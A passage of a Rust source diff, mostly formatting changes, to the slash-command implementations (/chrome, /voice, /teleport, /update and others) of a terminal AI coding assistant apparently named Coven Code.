tool_calls: usize = ctx.messages.iter() + let tool_calls: usize = ctx + .messages + .iter() .map(|m| m.get_tool_use_blocks().len()) .sum(); @@ -4861,14 +5317,19 @@ impl SlashCommand for StatsCommand { #[async_trait] impl SlashCommand for FilesCommand { - fn name(&self) -> &str { "files" } - fn description(&self) -> &str { "List files referenced in the current conversation" } + fn name(&self) -> &str { + "files" + } + fn description(&self) -> &str { + "List files referenced in the current conversation" + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { use std::collections::HashSet; // Scan message content for file paths (simple heuristic) let mut files: HashSet = HashSet::new(); - let path_re = regex::Regex::new(r#"(?m)([A-Za-z]:[\\/][^\s,;:"'<>]+|/[^\s,;:"'<>]{3,})"#).ok(); + let path_re = + regex::Regex::new(r#"(?m)([A-Za-z]:[\\/][^\s,;:"'<>]+|/[^\s,;:"'<>]{3,})"#).ok(); for msg in &ctx.messages { let text = msg.get_all_text(); @@ -4894,7 +5355,11 @@ impl SlashCommand for FilesCommand { CommandResult::Message(format!( "Referenced files ({}):\n{}", sorted.len(), - sorted.iter().map(|f| format!(" {}", f)).collect::>().join("\n") + sorted + .iter() + .map(|f| format!(" {}", f)) + .collect::>() + .join("\n") )) } } @@ -4903,8 +5368,12 @@ impl SlashCommand for FilesCommand { #[async_trait] impl SlashCommand for RenameCommand { - fn name(&self) -> &str { "rename" } - fn description(&self) -> &str { "Rename the current session" } + fn name(&self) -> &str { + "rename" + } + fn description(&self) -> &str { + "Rename the current session" + } fn help(&self) -> &str { "Usage: /rename [new name]\n\n\ With a name: sets the session title immediately.\n\ @@ -4936,12 +5405,18 @@ impl SlashCommand for RenameCommand { .take(20) .filter_map(|m| { let text = m.get_all_text(); - if text.is_empty() { return None; } + if text.is_empty() { + return None; + } let role = match m.role { claurst_core::types::Role::User => "User", claurst_core::types::Role::Assistant => "Assistant", }; - Some(format!("{}: {}", role, text.chars().take(300).collect::())) + Some(format!( + "{}: {}", + role, + text.chars().take(300).collect::() + )) }) .collect::>() .join("\n"); @@ -4988,7 +5463,9 @@ impl SlashCommand for RenameCommand { match provider.create_message(request).await { Ok(response) => { - let raw_text = text_from_content_blocks(&response.content).trim().to_string(); + let raw_text = text_from_content_blocks(&response.content) + .trim() + .to_string(); let generated = raw_text .to_lowercase() @@ -5001,7 +5478,8 @@ impl SlashCommand for RenameCommand { if cleaned.is_empty() { return CommandResult::Error( "Could not generate a valid name from conversation. \ - Use /rename to set manually.".to_string(), + Use /rename to set manually." + .to_string(), ); } @@ -5019,8 +5497,12 @@ impl SlashCommand for RenameCommand { #[async_trait] impl SlashCommand for EffortCommand { - fn name(&self) -> &str { "effort" } - fn description(&self) -> &str { "Set the model's thinking effort (low | normal | high)" } + fn name(&self) -> &str { + "effort" + } + fn description(&self) -> &str { + "Set the model's thinking effort (low | normal | high)" + } fn help(&self) -> &str { "Usage: /effort [low|normal|high]\n\ Sets how much computation the model uses for reasoning.\n\ @@ -5029,9 +5511,9 @@ impl SlashCommand for EffortCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { match args.trim() { - "" => CommandResult::Message(format!( - "Current effort: normal\nUse /effort [low|normal|high] to change." - )), + "" => CommandResult::Message( + "Current effort: normal\nUse /effort [low|normal|high] to change.".to_string(), + ), "low" => { // Low effort: smaller max_tokens ctx.config.max_tokens = Some(4096); @@ -5057,8 +5539,12 @@ impl SlashCommand for EffortCommand { #[async_trait] impl SlashCommand for SummaryCommand { - fn name(&self) -> &str { "summary" } - fn description(&self) -> &str { "Generate a brief summary of the conversation so far" } + fn name(&self) -> &str { + "summary" + } + fn description(&self) -> &str { + "Generate a brief summary of the conversation so far" + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { let count = ctx.messages.len(); @@ -5079,8 +5565,12 @@ impl SlashCommand for SummaryCommand { #[async_trait] impl SlashCommand for CommitCommand { - fn name(&self) -> &str { "commit" } - fn description(&self) -> &str { "Ask Coven Code to commit staged changes" } + fn name(&self) -> &str { + "commit" + } + fn description(&self) -> &str { + "Ask Coven Code to commit staged changes" + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let extra = if args.trim().is_empty() { @@ -5107,7 +5597,7 @@ impl SlashCommand for CommitCommand { #[derive(Debug, Clone, serde::Serialize, serde::Deserialize, Default)] struct UiSettings { #[serde(default)] - pub editor_mode: Option, // "vim" or "normal" + pub editor_mode: Option, // "vim" or "normal" #[serde(default)] pub fast_mode: Option, #[serde(default)] @@ -5169,9 +5659,15 @@ where #[async_trait] impl SlashCommand for RemoteControlCommand { - fn name(&self) -> &str { "remote-control" } - fn aliases(&self) -> Vec<&str> { vec!["rc"] } - fn description(&self) -> &str { "Show or manage the remote control (Bridge) connection" } + fn name(&self) -> &str { + "remote-control" + } + fn aliases(&self) -> Vec<&str> { + vec!["rc"] + } + fn description(&self) -> &str { + "Show or manage the remote control (Bridge) connection" + } fn help(&self) -> &str { "Usage: /remote-control [start|stop|status]\n\n\ The Bridge feature lets you connect your local Coven Code CLI to the\n\ @@ -5208,8 +5704,11 @@ impl SlashCommand for RemoteControlCommand { "not set (required to connect)" }; - let startup_status = - if remote_at_startup { "enabled at startup" } else { "disabled" }; + let startup_status = if remote_at_startup { + "enabled at startup" + } else { + "disabled" + }; // Active session info from context let session_section = if let Some(ref url) = ctx.remote_session_url { @@ -5317,8 +5816,12 @@ impl SlashCommand for RemoteControlCommand { #[async_trait] impl SlashCommand for RemoteEnvCommand { - fn name(&self) -> &str { "remote-env" } - fn description(&self) -> &str { "Show and manage environment variables for remote sessions" } + fn name(&self) -> &str { + "remote-env" + } + fn description(&self) -> &str { + "Show and manage environment variables for remote sessions" + } fn help(&self) -> &str { "Usage: /remote-env [set | unset | list]\n\n\ Manages env vars stored in config that are forwarded to remote Coven Code sessions.\n\ @@ -5384,9 +5887,7 @@ impl SlashCommand for RemoteEnvCommand { } "unset" | "remove" | "delete" => { if key.is_empty() { - return CommandResult::Error( - "Usage: /remote-env unset ".to_string(), - ); + return CommandResult::Error("Usage: /remote-env unset ".to_string()); } if !ctx.config.env.contains_key(key) { return CommandResult::Message(format!("Key '{}' is not set.", key)); @@ -5416,8 +5917,12 @@ impl SlashCommand for RemoteEnvCommand { #[async_trait] impl SlashCommand for ContextCommand { - fn name(&self) -> &str { "context" } - fn description(&self) -> &str { "Show context window usage (tokens used / available)" } + fn name(&self) -> &str { + "context" + } + fn description(&self) -> &str { + "Show context window usage (tokens used / available)" + } fn help(&self) -> &str { "Usage: /context\n\n\ Displays the current context window utilization:\n\ @@ -5430,17 +5935,7 @@ impl SlashCommand for ContextCommand { let model = ctx.config.effective_model(); // Determine context window size from known model names - let context_window: u64 = if model.contains("claude-3-5") || model.contains("claude-3.5") { - 200_000 - } else if model.contains("opus") { - 200_000 - } else if model.contains("sonnet") { - 200_000 - } else if model.contains("haiku") { - 200_000 - } else { - 200_000 // safe default for any Claude model - }; + let context_window: u64 = 200_000; let used_tokens = ctx.cost_tracker.total_tokens(); let pct = if context_window > 0 { @@ -5483,8 +5978,12 @@ impl SlashCommand for ContextCommand { #[async_trait] impl SlashCommand for CopyCommand { - fn name(&self) -> &str { "copy" } - fn description(&self) -> &str { "Copy the last assistant response to the clipboard" } + fn name(&self) -> &str { + "copy" + } + fn description(&self) -> &str { + "Copy the last assistant response to the clipboard" + } fn help(&self) -> &str { "Usage: /copy [n]\n\n\ Copies the most recent assistant response to the system clipboard.\n\ @@ -5569,6 +6068,7 @@ impl SlashCommand for CopyCommand { mod chrome_cdp { use base64::Engine as _; + use futures::{SinkExt, StreamExt}; use once_cell::sync::Lazy; use parking_lot::Mutex; use serde_json::{json, Value}; @@ -5577,7 +6077,6 @@ mod chrome_cdp { use tokio_tungstenite::{ connect_async, tungstenite::Message as WsMessage, MaybeTlsStream, WebSocketStream, }; - use futures::{SinkExt, StreamExt}; // ----------------------------------------------------------------------- // Global session state @@ -5610,7 +6109,7 @@ mod chrome_cdp { ) -> anyhow::Result { let id = next_id(); let request = json!({ "id": id, "method": method, "params": params }); - ws.send(WsMessage::Text(request.to_string().into())).await?; + ws.send(WsMessage::Text(request.to_string())).await?; // Drain messages until we get the one with our id (ignore events). loop { @@ -5671,9 +6170,9 @@ mod chrome_cdp { let ws_url = tabs .as_array() .and_then(|arr| { - arr.iter().find(|t| t["type"] == "page").and_then(|t| { - t["webSocketDebuggerUrl"].as_str().map(|s| s.to_string()) - }) + arr.iter() + .find(|t| t["type"] == "page") + .and_then(|t| t["webSocketDebuggerUrl"].as_str().map(|s| s.to_string())) }) .ok_or_else(|| { anyhow::anyhow!( @@ -5692,11 +6191,15 @@ mod chrome_cdp { }) .unwrap_or_default(); - let (ws, _) = connect_async(&ws_url).await.map_err(|e| { - anyhow::anyhow!("WebSocket connect to {} failed: {}", ws_url, e) - })?; + let (ws, _) = connect_async(&ws_url) + .await + .map_err(|e| anyhow::anyhow!("WebSocket connect to {} failed: {}", ws_url, e))?; - let mut session = ChromeSession { ws, port, tab_url: tab_url.clone() }; + let mut session = ChromeSession { + ws, + port, + tab_url: tab_url.clone(), + }; // Enable Page domain so captureScreenshot etc. work. cdp_call(&mut session.ws, "Page.enable", json!({})).await?; // Enable Runtime domain for eval/click/fill. @@ -5890,14 +6393,15 @@ mod chrome_cdp { store_session(s); result } - } // ---- SlashCommand impl ------------------------------------------------------- #[async_trait] impl SlashCommand for ChromeCommand { - fn name(&self) -> &str { "chrome" } + fn name(&self) -> &str { + "chrome" + } fn description(&self) -> &str { "Browser automation via Chrome DevTools Protocol (CDP)" } @@ -5930,10 +6434,7 @@ impl SlashCommand for ChromeCommand { match p.parse() { Ok(n) => n, Err(_) => { - return CommandResult::Error(format!( - "Invalid port number: {}", - p - )); + return CommandResult::Error(format!("Invalid port number: {}", p)); } } } else if rest.is_empty() { @@ -6059,9 +6560,15 @@ impl SlashCommand for ChromeCommand { #[async_trait] impl SlashCommand for VimCommand { - fn name(&self) -> &str { "vim" } - fn aliases(&self) -> Vec<&str> { vec!["vi"] } - fn description(&self) -> &str { "Toggle vim keybinding mode on/off" } + fn name(&self) -> &str { + "vim" + } + fn aliases(&self) -> Vec<&str> { + vec!["vi"] + } + fn description(&self) -> &str { + "Toggle vim keybinding mode on/off" + } fn help(&self) -> &str { "Usage: /vim [on|off]\n\n\ Toggles vim keybinding mode in the REPL input.\n\ @@ -6078,7 +6585,11 @@ impl SlashCommand for VimCommand { "off" | "normal" => "normal", "" => { // Toggle - if current_mode == "vim" { "normal" } else { "vim" } + if current_mode == "vim" { + "normal" + } else { + "vim" + } } other => { return CommandResult::Error(format!( @@ -6109,8 +6620,12 @@ impl SlashCommand for VimCommand { #[async_trait] impl SlashCommand for VoiceCommand { - fn name(&self) -> &str { "voice" } - fn description(&self) -> &str { "Toggle voice input mode on/off" } + fn name(&self) -> &str { + "voice" + } + fn description(&self) -> &str { + "Toggle voice input mode on/off" + } fn help(&self) -> &str { "Usage: /voice [on|off|status]\n\n\ Enables or disables voice input (push-to-talk).\n\ @@ -6137,9 +6652,14 @@ impl SlashCommand for VoiceCommand { "off" | "disable" | "disabled" | "false" | "0" => false, "" => !currently_enabled, // toggle "status" => { - let state = if currently_enabled { "enabled" } else { "disabled" }; - let endpoint = std::env::var("WHISPER_ENDPOINT_URL") - .unwrap_or_else(|_| "https://api.openai.com/v1/audio/transcriptions (default)".to_string()); + let state = if currently_enabled { + "enabled" + } else { + "disabled" + }; + let endpoint = std::env::var("WHISPER_ENDPOINT_URL").unwrap_or_else(|_| { + "https://api.openai.com/v1/audio/transcriptions (default)".to_string() + }); let key_source = if std::env::var("OPENAI_API_KEY").is_ok() { "OPENAI_API_KEY" } else if std::env::var("ANTHROPIC_API_KEY").is_ok() { @@ -6183,9 +6703,7 @@ impl SlashCommand for VoiceCommand { endpoint, key_hint )) } else { - CommandResult::Message( - "Voice recording deactivated.".to_string(), - ) + CommandResult::Message("Voice recording deactivated.".to_string()) } } Err(e) => CommandResult::Error(format!("Failed to save voice setting: {}", e)), @@ -6197,9 +6715,15 @@ impl SlashCommand for VoiceCommand { #[async_trait] impl SlashCommand for UpgradeCommand { - fn name(&self) -> &str { "update" } - fn aliases(&self) -> Vec<&str> { vec!["upgrade"] } - fn description(&self) -> &str { "Check for updates and download the latest release" } + fn name(&self) -> &str { + "update" + } + fn aliases(&self) -> Vec<&str> { + vec!["upgrade"] + } + fn description(&self) -> &str { + "Check for updates and download the latest release" + } fn help(&self) -> &str { "Usage: /update\n\n\ Checks GitHub releases for the latest version of Coven Code.\n\ @@ -6233,8 +6757,7 @@ impl SlashCommand for UpgradeCommand { match resp { Ok(r) if r.status().is_success() => { - let json: serde_json::Value = - r.json().await.unwrap_or(serde_json::Value::Null); + let json: serde_json::Value = r.json().await.unwrap_or(serde_json::Value::Null); let tag = json .get("tag_name") @@ -6286,8 +6809,12 @@ impl SlashCommand for UpgradeCommand { #[async_trait] impl SlashCommand for ReleaseNotesCommand { - fn name(&self) -> &str { "release-notes" } - fn description(&self) -> &str { "Show release notes for the current version" } + fn name(&self) -> &str { + "release-notes" + } + fn description(&self) -> &str { + "Show release notes for the current version" + } fn help(&self) -> &str { "Usage: /release-notes [version]\n\n\ Fetches and displays release notes from GitHub.\n\ @@ -6328,8 +6855,7 @@ impl SlashCommand for ReleaseNotesCommand { match client.get(&url).send().await { Ok(r) if r.status().is_success() => { - let json: serde_json::Value = - r.json().await.unwrap_or(serde_json::Value::Null); + let json: serde_json::Value = r.json().await.unwrap_or(serde_json::Value::Null); let body = json .get("body") @@ -6341,10 +6867,7 @@ impl SlashCommand for ReleaseNotesCommand { .and_then(|v| v.as_str()) .unwrap_or("unknown date"); - let html_url = json - .get("html_url") - .and_then(|v| v.as_str()) - .unwrap_or(""); + let html_url = json.get("html_url").and_then(|v| v.as_str()).unwrap_or(""); CommandResult::Message(format!( "Release Notes: Coven Code {tag}\n\ @@ -6376,8 +6899,12 @@ impl SlashCommand for ReleaseNotesCommand { #[async_trait] impl SlashCommand for RateLimitOptionsCommand { - fn name(&self) -> &str { "rate-limit-options" } - fn description(&self) -> &str { "Show rate limit tiers and current rate limit status" } + fn name(&self) -> &str { + "rate-limit-options" + } + fn description(&self) -> &str { + "Show rate limit tiers and current rate limit status" + } fn help(&self) -> &str { "Usage: /rate-limit-options\n\n\ Displays available rate limit tiers and the current tier for your account.\n\ @@ -6393,7 +6920,11 @@ impl SlashCommand for RateLimitOptionsCommand { "Account type: {}\n\ Scopes: {}", sub_type, - if tokens.scopes.is_empty() { "none".to_string() } else { tokens.scopes.join(", ") } + if tokens.scopes.is_empty() { + "none".to_string() + } else { + tokens.scopes.join(", ") + } ) } None => { @@ -6431,8 +6962,12 @@ impl SlashCommand for RateLimitOptionsCommand { #[async_trait] impl SlashCommand for StatuslineCommand { - fn name(&self) -> &str { "statusline" } - fn description(&self) -> &str { "Configure what is shown in the status line" } + fn name(&self) -> &str { + "statusline" + } + fn description(&self) -> &str { + "Configure what is shown in the status line" + } fn help(&self) -> &str { "Usage: /statusline [show|hide] [cost|tokens|model|time|all]\n\n\ Controls which items appear in the TUI status bar at the bottom.\n\ @@ -6486,10 +7021,12 @@ impl SlashCommand for StatuslineCommand { s.statusline_show_model = Some(show); s.statusline_show_time = Some(show); }) { - Ok(_) => return CommandResult::Message(format!( - "Status line: all items {}.", - if show { "shown" } else { "hidden" } - )), + Ok(_) => { + return CommandResult::Message(format!( + "Status line: all items {}.", + if show { "shown" } else { "hidden" } + )) + } Err(e) => return CommandResult::Error(format!("Failed to save: {}", e)), } } @@ -6519,15 +7056,23 @@ impl SlashCommand for StatuslineCommand { } fn fmt_bool(v: bool) -> &'static str { - if v { "on" } else { "off" } + if v { + "on" + } else { + "off" + } } // ---- /security-review ---------------------------------------------------- #[async_trait] impl SlashCommand for SecurityReviewCommand { - fn name(&self) -> &str { "security-review" } - fn description(&self) -> &str { "Run a security review of the current project" } + fn name(&self) -> &str { + "security-review" + } + fn description(&self) -> &str { + "Run a security review of the current project" + } fn help(&self) -> &str { "Usage: /security-review [path]\n\n\ Asks Coven Code to perform a security review of the codebase.\n\ @@ -6571,8 +7116,12 @@ impl SlashCommand for SecurityReviewCommand { #[async_trait] impl SlashCommand for TerminalSetupCommand { - fn name(&self) -> &str { "terminal-setup" } - fn description(&self) -> &str { "Help configure your terminal for optimal Coven Code use" } + fn name(&self) -> &str { + "terminal-setup" + } + fn description(&self) -> &str { + "Help configure your terminal for optimal Coven Code use" + } fn help(&self) -> &str { "Usage: /terminal-setup\n\n\ Diagnoses your terminal environment and gives recommendations for\n\ @@ -6610,10 +7159,15 @@ impl SlashCommand for TerminalSetupCommand { // Check if UNICODE is likely supported let lang = std::env::var("LANG").unwrap_or_default(); let lc_all = std::env::var("LC_ALL").unwrap_or_default(); - let unicode_env = lang.to_lowercase().contains("utf") || lc_all.to_lowercase().contains("utf"); + let unicode_env = + lang.to_lowercase().contains("utf") || lc_all.to_lowercase().contains("utf"); checks.push(format!( "Unicode/UTF-8: {}", - if unicode_env { "likely supported (LANG/LC_ALL contains UTF)" } else { "check LANG env var" } + if unicode_env { + "likely supported (LANG/LC_ALL contains UTF)" + } else { + "check LANG env var" + } )); // Check for known good terminals @@ -6621,11 +7175,15 @@ impl SlashCommand for TerminalSetupCommand { term_program.to_lowercase().as_str(), "iterm.app" | "iterm2" | "hyper" | "warp" | "alacritty" | "kitty" | "wezterm" ) || term_program.to_lowercase().contains("vscode") - || term_program.to_lowercase().contains("terminal"); + || term_program.to_lowercase().contains("terminal"); checks.push(format!( "Terminal type: {}", - if is_good_terminal { "well-known terminal (good)" } else { "verify settings below" } + if is_good_terminal { + "well-known terminal (good)" + } else { + "verify settings below" + } )); // Shell detection @@ -6633,8 +7191,8 @@ impl SlashCommand for TerminalSetupCommand { checks.push(format!("Shell: {}", shell)); // Check for Nerd Fonts (heuristic: environment variable set by some terminals) - let nerd_font = std::env::var("NERD_FONT").is_ok() - || std::env::var("TERM_NERD_FONT").is_ok(); + let nerd_font = + std::env::var("NERD_FONT").is_ok() || std::env::var("TERM_NERD_FONT").is_ok(); CommandResult::Message(format!( "Terminal Setup Diagnostic\n\ @@ -6670,8 +7228,12 @@ impl SlashCommand for TerminalSetupCommand { #[async_trait] impl SlashCommand for ExtraUsageCommand { - fn name(&self) -> &str { "extra-usage" } - fn description(&self) -> &str { "Show detailed usage statistics: calls, cache, tools" } + fn name(&self) -> &str { + "extra-usage" + } + fn description(&self) -> &str { + "Show detailed usage statistics: calls, cache, tools" + } fn help(&self) -> &str { "Usage: /extra-usage\n\n\ Displays extended usage statistics beyond /cost:\n\ @@ -6690,7 +7252,9 @@ impl SlashCommand for ExtraUsageCommand { let cost = ctx.cost_tracker.total_cost_usd(); // Estimate API calls from messages (each assistant message ~ 1 API call) - let api_calls = ctx.messages.iter() + let api_calls = ctx + .messages + .iter() .filter(|m| m.role == claurst_core::types::Role::Assistant) .count(); let api_calls = api_calls.max(1); // at least 1 if we have any data @@ -6744,7 +7308,11 @@ impl SlashCommand for ExtraUsageCommand { "No cache activity" }, cost = cost, - cost_per_k = if total > 0 { cost / (total as f64 / 1000.0) } else { 0.0 }, + cost_per_k = if total > 0 { + cost / (total as f64 / 1000.0) + } else { + 0.0 + }, )) } } @@ -6753,8 +7321,12 @@ impl SlashCommand for ExtraUsageCommand { #[async_trait] impl SlashCommand for AdvisorCommand { - fn name(&self) -> &str { "advisor" } - fn description(&self) -> &str { "Set or unset the server-side advisor model" } + fn name(&self) -> &str { + "advisor" + } + fn description(&self) -> &str { + "Set or unset the server-side advisor model" + } fn help(&self) -> &str { "Usage: /advisor [|off|unset]\n\n\ Sets the advisor model used for server-side suggestions.\n\ @@ -6817,28 +7389,24 @@ impl SlashCommand for AdvisorCommand { #[async_trait] impl SlashCommand for InstallSlackAppCommand { - fn name(&self) -> &str { "install-slack-app" } - fn description(&self) -> &str { "Install the Coven Code Slack integration" } + fn name(&self) -> &str { + "install-slack-app" + } + fn description(&self) -> &str { + "Show Slack integration availability" + } + fn hidden(&self) -> bool { + true + } fn help(&self) -> &str { "Usage: /install-slack-app\n\n\ - Opens instructions for installing the Coven Code Slack app.\n\ - Requires a Coven Code for Enterprise subscription." + The Slack integration installer is not available in this build." } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { - CommandResult::Message( - "Coven Code Slack Integration\n\ - ─────────────────────────────\n\ - To install Coven Code in Slack:\n\n\ - 1. Ensure you have a Coven Code for Enterprise subscription\n\ - 2. Visit your Anthropic Console → Integrations → Slack\n\ - 3. Click \"Add to Slack\" and authorize the app\n\ - 4. Invite @Coven Code to any channel with: /invite @Coven Code\n\n\ - In Slack, you can then:\n\ - • Mention @Coven Code to ask questions in any channel\n\ - • Use /claude for direct commands\n\ - • Share code snippets for review\n\n\ - See: https://docs.anthropic.com/claude-code/slack" + CommandResult::Error( + "Slack integration setup is not available in this build. \ + Configure Slack through a maintained plugin or external MCP server instead." .to_string(), ) } @@ -6848,9 +7416,15 @@ impl SlashCommand for InstallSlackAppCommand { #[async_trait] impl SlashCommand for FastCommand { - fn name(&self) -> &str { "fast" } - fn aliases(&self) -> Vec<&str> { vec!["speed"] } - fn description(&self) -> &str { "Toggle fast mode (uses a faster/cheaper model)" } + fn name(&self) -> &str { + "fast" + } + fn aliases(&self) -> Vec<&str> { + vec!["speed"] + } + fn description(&self) -> &str { + "Toggle fast mode (uses a faster/cheaper model)" + } fn help(&self) -> &str { "Usage: /fast [on|off]\n\n\ Fast mode switches to the active provider's smaller, faster model\n\ @@ -6880,11 +7454,8 @@ impl SlashCommand for FastCommand { let provider_id = ctx.config.selected_provider_id(); let fast_model = resolve_fast_model_id(&ctx.config); - let normal_model = stripped_model_for_provider( - provider_id, - ctx.config.effective_model(), - ) - .to_string(); + let normal_model = + stripped_model_for_provider(provider_id, ctx.config.effective_model()).to_string(); if enable { let mut new_config = ctx.config.clone(); @@ -6901,11 +7472,8 @@ impl SlashCommand for FastCommand { let mut new_config = ctx.config.clone(); // Restore default / saved model new_config.model = None; - let restored_model = stripped_model_for_provider( - provider_id, - new_config.effective_model(), - ) - .to_string(); + let restored_model = + stripped_model_for_provider(provider_id, new_config.effective_model()).to_string(); CommandResult::ConfigChangeMessage( new_config, format!( @@ -6921,9 +7489,15 @@ impl SlashCommand for FastCommand { #[async_trait] impl SlashCommand for ThinkBackCommand { - fn name(&self) -> &str { "think-back" } - fn aliases(&self) -> Vec<&str> { vec!["thinkback"] } - fn description(&self) -> &str { "Show thinking traces from previous responses in this session" } + fn name(&self) -> &str { + "think-back" + } + fn aliases(&self) -> Vec<&str> { + vec!["thinkback"] + } + fn description(&self) -> &str { + "Show thinking traces from previous responses in this session" + } fn help(&self) -> &str { "Usage: /think-back [n]\n\n\ Displays the thinking/reasoning traces from the most recent model responses.\n\ @@ -6955,7 +7529,11 @@ impl SlashCommand for ThinkBackCommand { }) .collect::>() .join("\n\n"); - if thinking.is_empty() { None } else { Some((idx, thinking)) } + if thinking.is_empty() { + None + } else { + Some((idx, thinking)) + } }) .collect(); @@ -6991,8 +7569,12 @@ impl SlashCommand for ThinkBackCommand { #[async_trait] impl SlashCommand for ThinkBackPlayCommand { - fn name(&self) -> &str { "thinkback-play" } - fn description(&self) -> &str { "Replay a thinking trace as an animated walkthrough" } + fn name(&self) -> &str { + "thinkback-play" + } + fn description(&self) -> &str { + "Replay a thinking trace as an animated walkthrough" + } fn help(&self) -> &str { "Usage: /thinkback-play [n]\n\n\ Replays a previous thinking trace, formatted for easy reading.\n\ @@ -7022,7 +7604,11 @@ impl SlashCommand for ThinkBackPlayCommand { }) .collect::>() .join("\n\n"); - if t.is_empty() { None } else { Some(t) } + if t.is_empty() { + None + } else { + Some(t) + } }) .collect(); @@ -7061,10 +7647,18 @@ impl SlashCommand for ThinkBackPlayCommand { #[async_trait] impl SlashCommand for FeedbackCommand { - fn name(&self) -> &str { "report" } - fn aliases(&self) -> Vec<&str> { vec![] } - fn description(&self) -> &str { "Open the GitHub issues page to report a bug or request a feature" } - fn hidden(&self) -> bool { true } // surfaced via BugCommand alias; hidden to avoid duplicate + fn name(&self) -> &str { + "report" + } + fn aliases(&self) -> Vec<&str> { + vec![] + } + fn description(&self) -> &str { + "Open the GitHub issues page to report a bug or request a feature" + } + fn hidden(&self) -> bool { + true + } // surfaced via BugCommand alias; hidden to avoid duplicate fn help(&self) -> &str { "Usage: /report [description]\n\n\ Opens the GitHub issues tracker. If a description is provided,\n\ @@ -7078,19 +7672,12 @@ impl SlashCommand for FeedbackCommand { url.to_string() } else { // Append as a body query param - format!( - "{}?body={}", - url, - urlencoding::encode(report) - ) + format!("{}?body={}", url, urlencoding::encode(report)) }; match open_with_system(&display_url) { Ok(_) => CommandResult::Message(format!("Opened issue tracker: {}", url)), - Err(_) => CommandResult::Message(format!( - "Please visit {} to submit a report.", - url - )), + Err(_) => CommandResult::Message(format!("Please visit {} to submit a report.", url)), } } } @@ -7099,9 +7686,15 @@ impl SlashCommand for FeedbackCommand { #[async_trait] impl SlashCommand for ColorSetCommand { - fn name(&self) -> &str { "color-set" } - fn hidden(&self) -> bool { true } - fn description(&self) -> &str { "Internal: set prompt color — use /color instead" } + fn name(&self) -> &str { + "color-set" + } + fn hidden(&self) -> bool { + true + } + fn description(&self) -> &str { + "Internal: set prompt color — use /color instead" + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let color = args.trim(); @@ -7120,10 +7713,11 @@ impl SlashCommand for ColorSetCommand { } else { // Validate hex or named color let known_colors = [ - "red", "green", "blue", "yellow", "cyan", "magenta", - "white", "orange", "purple", "pink", "gray", "grey", + "red", "green", "blue", "yellow", "cyan", "magenta", "white", "orange", "purple", + "pink", "gray", "grey", ]; - let is_hex = color.starts_with('#') && (color.len() == 4 || color.len() == 7) + let is_hex = color.starts_with('#') + && (color.len() == 4 || color.len() == 7) && color[1..].chars().all(|c| c.is_ascii_hexdigit()); if !is_hex && !known_colors.contains(&color.to_lowercase().as_str()) { return CommandResult::Error(format!( @@ -7149,8 +7743,12 @@ impl SlashCommand for ColorSetCommand { #[async_trait] impl SlashCommand for SearchCommand { - fn name(&self) -> &str { "search" } - fn description(&self) -> &str { "Search across all sessions" } + fn name(&self) -> &str { + "search" + } + fn description(&self) -> &str { + "Search across all sessions" + } fn help(&self) -> &str { "Usage: /search \n\n\ Searches session titles and message content in the local SQLite\n\ @@ -7184,19 +7782,11 @@ impl SlashCommand for SearchCommand { let results = match store.search_sessions(query) { Ok(r) => r, - Err(e) => { - return CommandResult::Error(format!( - "Search failed: {}", - e - )) - } + Err(e) => return CommandResult::Error(format!("Search failed: {}", e)), }; if results.is_empty() { - return CommandResult::Message(format!( - "No sessions found matching \"{}\".", - query - )); + return CommandResult::Message(format!("No sessions found matching \"{}\".", query)); } let mut out = format!( @@ -7277,8 +7867,12 @@ mod teleport_bundle { #[async_trait] impl SlashCommand for TeleportCommand { - fn name(&self) -> &str { "teleport" } - fn description(&self) -> &str { "Export/import/link session context as a portable bundle" } + fn name(&self) -> &str { + "teleport" + } + fn description(&self) -> &str { + "Export/import/link session context as a portable bundle" + } fn help(&self) -> &str { "Usage:\n\ \n\ @@ -7351,7 +7945,9 @@ impl SlashCommand for TeleportCommand { for key in &candidates { if let Some(v) = input.get(key) { if let Some(s) = v.as_str() { - if !s.is_empty() && !seen.contains(&s.to_string()) { + if !s.is_empty() + && !seen.contains(&s.to_string()) + { seen.push(s.to_string()); } } @@ -7386,10 +7982,12 @@ impl SlashCommand for TeleportCommand { .map(str::to_string) .collect(); redacted_env_vars.extend( - claurst_core::config::api_key_env_vars_for_provider(ctx.config.selected_provider_id()) - .iter() - .copied() - .map(str::to_string), + claurst_core::config::api_key_env_vars_for_provider( + ctx.config.selected_provider_id(), + ) + .iter() + .copied() + .map(str::to_string), ); let env: std::collections::HashMap = std::env::vars() .filter(|(k, _)| !redacted_env_vars.contains(k)) @@ -7419,7 +8017,11 @@ impl SlashCommand for TeleportCommand { action: PermissionAction::Deny, }); } - TeleportPermissions { allowed, denied, rules } + TeleportPermissions { + allowed, + denied, + rules, + } }; // ---- build bundle ----------------------------------------- @@ -7439,7 +8041,9 @@ impl SlashCommand for TeleportCommand { // ---- serialize and write ---------------------------------- let json = match serde_json::to_string_pretty(&bundle) { Ok(j) => j, - Err(e) => return CommandResult::Error(format!("Failed to serialize bundle: {}", e)), + Err(e) => { + return CommandResult::Error(format!("Failed to serialize bundle: {}", e)) + } }; if let Err(e) = std::fs::write(&output_path, &json) { @@ -7469,28 +8073,30 @@ impl SlashCommand for TeleportCommand { "import" => { if rest.is_empty() { - return CommandResult::Error( - "Usage: /teleport import ".to_string(), - ); + return CommandResult::Error("Usage: /teleport import ".to_string()); } let path = std::path::PathBuf::from(rest); let data = match std::fs::read_to_string(&path) { Ok(s) => s, - Err(e) => return CommandResult::Error(format!( - "Cannot read teleport bundle '{}': {}", - path.display(), - e - )), + Err(e) => { + return CommandResult::Error(format!( + "Cannot read teleport bundle '{}': {}", + path.display(), + e + )) + } }; let bundle: TeleportBundle = match serde_json::from_str(&data) { Ok(b) => b, - Err(e) => return CommandResult::Error(format!( - "Failed to parse teleport bundle: {}", - e - )), + Err(e) => { + return CommandResult::Error(format!( + "Failed to parse teleport bundle: {}", + e + )) + } }; // ---- validate version ------------------------------------ @@ -7544,7 +8150,11 @@ impl SlashCommand for TeleportCommand { exported_at, msg_count, working_dir_display, - if dir_restored { " (restored)" } else { " (path not found, skipped)" }, + if dir_restored { + " (restored)" + } else { + " (path not found, skipped)" + }, allowed_count, denied_count, files_count, @@ -7553,8 +8163,8 @@ impl SlashCommand for TeleportCommand { "link" => { // ---- build a minimal bundle for the link (no env vars) --- - 